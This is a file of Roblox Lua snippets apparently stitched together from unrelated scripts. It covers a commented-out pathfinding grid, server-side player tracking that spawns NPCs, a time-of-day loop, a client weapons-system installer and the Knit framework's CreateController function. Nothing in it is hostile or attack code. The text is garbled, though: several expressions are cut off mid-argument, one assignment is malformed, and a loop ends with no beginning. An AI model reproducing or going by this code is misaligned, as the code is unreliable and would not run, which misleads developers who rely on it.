--[[ Revisit, not needed atm function map:CreateFatGrid() map.fatgrid = {} for x = 0, map.sizeX - 1, map.fatgridSize do for y = 0, map.sizeY - 1, map.fatgridSize do local node = {} node.x = x node.y = y node.nodes = {} map.fatgrid[, y/map.fatgridSize)] = node end end for counter --find all the edge cells that have connections (north soth east west) --top edge local tempList = {} for xx = 0, map.fatgridSize-1 do local coord = map:GetPoint(, y + 0)) local otherCoord = map:GetPoint(, y + 0 - 1) ) if (coord and otherCoord and coord.cost < map.impassible and otherCoord.cost < map.impassible) then --We have a link tempList[xx] = { coord, otherCoord } --debugBall(coord,,0,0)) --debugBall(otherCoord,,1,0)) end end --Create a new list of connections with only 1 neighbor local newList = {} for xx = 0, map.fatgridSize-1 do if (tempList[xx] ~= nil and (tempList[xx-1] ==nil or tempList[xx+1] == nil)) then table.insert(newList, tempList[xx]) end end local tileCol = Color3.fromHSV(math.random(),1,1) for key,tab in pairs(newList) do debugBall(tab[1], tileCol) debugBall(tab[2],,1,0)) end end end end ]]
-- map:GenerateDummy() map:CreateVisuals() local server = {} server.playerRecords = {} function server:OnPlayerConnected(player) local playerRecord = {} playerRecord.userId = player.UserId = player.Name playerRecord.displayName = player.DisplayName playerRecord.player = player self.playerRecords[player.UserId] = playerRecord nerds:PlayerConnected(playerRecord) end function server:GetPlayers() return self.playerRecords end function server:OnPlayerDisconnected(player) self.playerRecords[player.UserId] = nil end function server:Setup() nerds:Setup() game.Players.PlayerAdded:Connect(function(player) self:OnPlayerConnected(player) end) game.Players.PlayerRemoving:Connect(function(player) self:OnPlayerDisconnected(player) end) for key,player in pairs(game.Players:GetPlayers()) do self:OnPlayerConnected(player) end wait(10) nerds:SetMap(map) nerds:CreateNerds(1000, server) end server:Setup()
-- increment the time of day and then wait for a while
l:SetMinutesAfterMidnight(l:GetMinutesAfterMidnight()+1) wait(.1) end
--If this script has been installed already, we can stop this instance. Otherwise, --this instance is the first to run of this version, so we'll install it to PlayerScripts. --This is necessary because if we left it inside the Tool, it would stop running when the player --dropped the tool or died, so our WeaponsSystem instance would be garbage-collected.
if ClientWeaponsScript and ClientWeaponsScript ~= script then return else CollectionService:AddTag(script, "ClientWeaponsSystem") script.Parent = PlayerScripts end print("Starting ClientWeaponsScript") local WeaponsSystemFolder = nil local function searchForWeaponsSystem() local anyPossible = false for i, weaponsSystem in pairs(CollectionService:GetTagged(WEAPONS_SYSTEM_TAG)) do anyPossible = true if weaponsSystem:IsDescendantOf(ReplicatedStorage) then local systemVersionObj = weaponsSystem:WaitForChild("Version") if systemVersionObj and systemVersionObj.Value == ScriptVersion then WeaponsSystemFolder = weaponsSystem break end end end return anyPossible end
--[=[ Creates a new controller. :::caution Controllers must be created _before_ calling `Knit.Start()`. ::: ```lua -- Create a controller local MyController = Knit.CreateController { Name = "MyController", } function MyController:KnitStart() print("MyController started") end function MyController:KnitInit() print("MyController initialized") end ``` ]=]
function KnitClient.CreateController(controllerDef: ControllerDef): Controller assert(type(controllerDef) == "table", `Controller must be a table; got {type(controllerDef)}`) assert(type(controllerDef.Name) == "string", `Controller.Name must be a string; got {type(controllerDef.Name)}`) assert(#controllerDef.Name > 0, "Controller.Name must be a non-empty string") assert(not DoesControllerExist(controllerDef.Name), `Controller {controllerDef.Name} already exists`) local controller = controllerDef :: Controller controllers[controller.Name] = controller return controller end